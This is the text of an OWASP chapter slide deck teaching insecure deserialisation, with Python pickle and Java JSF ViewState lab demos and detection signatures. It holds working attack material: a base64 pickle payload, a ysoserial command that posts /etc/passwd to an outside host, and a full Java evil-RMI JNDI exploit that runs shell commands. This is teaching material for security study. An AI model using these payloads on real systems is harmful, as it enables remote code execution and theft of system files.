Jan 30, 2022 OWASP Vellore Why So Serial? DEMYSTIFYING INSECURE DEMYSTIFYING INSECURE DEMYSTIFYING INSECURE DESERIALISATION DESERIALISATION DESERIALISATION

root_js jeyaseelan86 Why So Serial ? Demystifying Insecure Deserialisation $ whoami Jeya Seelan Security Researcher. Bug Hunter. Team Tamil Security Hub. Information Security Engineer, Zoho.

Let's get started! Are you ready?

Why So Serial ? Demystifying Insecure Deserialisation Today's Agenda 3 6 Questions What can go wrong 1 Preface 4 Demo Time 2 Serialisation what? why? where? 5 Deserialization

Object Oriented Programming Preface Object-Oriented Programming is all about creating “objects”. An object is a group of interrelated variables and functions. These variables are often referred to as properties of the object and functions are referred to as the behavior of the objects. Example Human Object Height, Name, Age, Gender, Mother Tongue, etc...

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male PROBLEM ?? We need to store or send the object without altering the state of Human object.

THE SOLUTION SERIALIZATION

What? Why? Where? SERIALISATION

What? Serialization is the process of converting an object state into a format that can be transmitted or stored. It is also known as Marshalling or pickling Many popular programming languages have serialization support included in the language core or in the standard library.

Why? Objects are composed of several components, saving or delivering all the parts typically requires significant coding effort, so serialization is a standard way to capture the object into a sharable format. 👉🏻 Easy to transfer 👉🏻 Reversible to original form 👉🏻Persist State

Where? transferring data through the wires (messaging). storing data (in databases, on hard disk drives). remote procedure calls, e.g., as in SOAP. Caching and Persistence HTTP cookies, View State

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC Serialisation {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"M ale","GovtID":"AABBCC"}

DESERIALISATION Deserialization is the opposite of serialization. Deserialization is the process of reconstructing a data structure or object from a series of bytes or a string.

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"M ale","GovtID":"AABBCC"} Deserialisation

WHAT CAN GO WRONG? HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : AABBCC

HUMAN OBJECT Height : 170 cm Age : 25 Name : Kumar Gender : Male GovtID : QQWWEE {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"Male", "GovtID":"QQWWEE"} Deserialisation MANIPULATED SERIALISED DATA MODIFIED OBJECT Insecure

No content

No content

DEMO TIME !

DEMO - I PYTHON DESERIALISATION To Setup the Lab docker pull jeyaseelan86/pydeser:pickle

Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

EXPLOIT gASVOAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjB10b3VjaCBoYWNrZWRieWRlc2VyaWFsaXNhdGlvbpSFlFKULg==

DEMO - II JAVA JSF VIEWSTATE DESERIALISATION To Setup the Lab docker pull jeyaseelan86/javadeser:jsf

JSF Viewstate Deserialisation

JSF Viewstate Deserialisation

JSF Viewstate Deserialisation

JSF Viewstate Deserialisation

JSF Viewstate Deserialisation

JSF Viewstate Deserialisation

JSF Viewstate Deserialisation java -jar ysoserial-master-8eb5cbfbf6-1.jar Jdk7u21 "curl -d @/etc/passwd http://ip"

JSF Viewstate Deserialisation

DETECTING INSECURE DESERIALISATION

WHITE BOX APPROACH PYTHON pickle.loads() marshall.loads() pyyaml.loads() jsonpickle.decode()

WHITE BOX APPROACH JAVA ObjectInputStream with readObject Use of readObject, readObjectNodData, readResolve or readExternal XMLdecoder with external user defined parameters Serializable

BLACK BOX APPROACH JAVA AC ED 00 05 in HEX H4sIAAAAAAAAAJ in GZIP Base64 rO0 in Base64 Content-type header application/x-java-serialized- object

WHITE BOX APPROACH PYTHON pickle.loads() marshall.loads() pyyaml.loads() jsonpickle.decode()

DETECTION TOOLS JAVA - YSOSERIAL, MARSHALLSEC , JEXBOSS .NET - YSOSERIAL.NET PYTHON - DESER-PY

NOTABLE BUGS 1 pickle 3 pyyaml deser 5 Xtreme Object Deser 2 Deserilisation in oracle weblogic , JBoss, jenkins etc.. 4 Ruby Deserialisation 6 Jackson Deserialisation

BONUS

import java.rmi.registry.*; import com.sun.jndi.rmi.registry.*; import javax.naming.*; import org.apache.naming.ResourceRef; public class EvilRMIServerNew { public static void main(String[] args) throws Exception { System.out.println("Creating evil RMI registry on port 1097"); Registry registry = LocateRegistry.createRegistry(1097); //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code ref.add(new StringRefAddr("forceString", "x=eval")); //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")")); ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); registry.bind("Object", referenceWrapper); } }

Questions ? Shoot your Doubts?

Thank you! Have a great day ahead.

Reach me on ! @root_js @jeyaseelans @jeyaseelans86 @dramatic_admin